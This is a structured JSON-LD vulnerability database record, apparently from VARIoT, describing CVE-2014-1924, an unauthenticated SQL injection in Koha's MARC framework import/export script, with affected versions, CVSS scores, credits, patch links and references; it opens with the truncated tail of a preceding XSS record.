"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201412-537"
}
],
"trust": 0.6
}
}
var-202001-1230
Vulnerability from variot
The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors. Koha In SQL An injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Koha is prone to the following security vulnerabilities: 1. An arbitrary file-access vulnerability 2. A directory-traversal vulnerability 3. An arbitrary file-write vulnerability 4. An SQL-injection vulnerability An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1230",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.08.23"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.12.10"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.10.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.12.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.03"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.10.13"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.8.22"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.14.2"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.12.9"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.10.12"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.8.23"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.14.3"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.12.10"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.10.13"
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "NVD",
"id": "CVE-2014-1924"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Chris Cormack, Galen Charlton, and John Lightsey",
"sources": [
{
"db": "BID",
"id": "65448"
}
],
"trust": 0.3
},
"cve": "CVE-2014-1924",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-1924",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2014-1924",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2014-1924",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-1924",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2014-1924",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-1090",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008839"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1090"
},
{
"db": "NVD",
"id": "CVE-2014-1924"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 does not require authentication, which allows remote attackers to conduct SQL injection attacks via unspecified vectors. Koha In SQL An injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Koha is prone to the following security vulnerabilities:\n1. An arbitrary file-access vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary file-write vulnerability\n4. An SQL-injection vulnerability\nAn attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1924"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008839"
},
{
"db": "BID",
"id": "65448"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-1924",
"trust": 2.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/02/07/10",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/02/10/3",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008839",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1090",
"trust": 0.6
},
{
"db": "BID",
"id": "65448",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008839"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1090"
},
{
"db": "NVD",
"id": "CVE-2014-1924"
}
]
},
"id": "VAR-202001-1230",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5804196
},
"last_update_date": "2024-11-23T22:16:39.958000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Bug\u00a011666 Koha",
"trust": 0.8,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
},
{
"title": "Koha SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112801"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008839"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1090"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.0
},
{
"problemtype": "SQL injection (CWE-89) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008839"
},
{
"db": "NVD",
"id": "CVE-2014-1924"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
},
{
"trust": 1.9,
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-1924"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
},
{
"trust": 0.3,
"url": "http://koha-community.org/"
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008839"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1090"
},
{
"db": "NVD",
"id": "CVE-2014-1924"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008839"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1090"
},
{
"db": "NVD",
"id": "CVE-2014-1924"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-07T00:00:00",
"db": "BID",
"id": "65448"
},
{
"date": "2020-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008839"
},
{
"date": "2020-01-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1090"
},
{
"date": "2020-01-24T17:15:12.327000",
"db": "NVD",
"id": "CVE-2014-1924"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-07T00:00:00",
"db": "BID",
"id": "65448"
},
{
"date": "2020-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008839"
},
{
"date": "2021-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1090"
},
{
"date": "2024-11-21T02:05:17.070000",
"db": "NVD",
"id": "CVE-2014-1924"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "65448"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Koha\u00a0 In \u00a0SQL\u00a0 Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008839"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-1090"
}
],
"trust": 0.6
}
}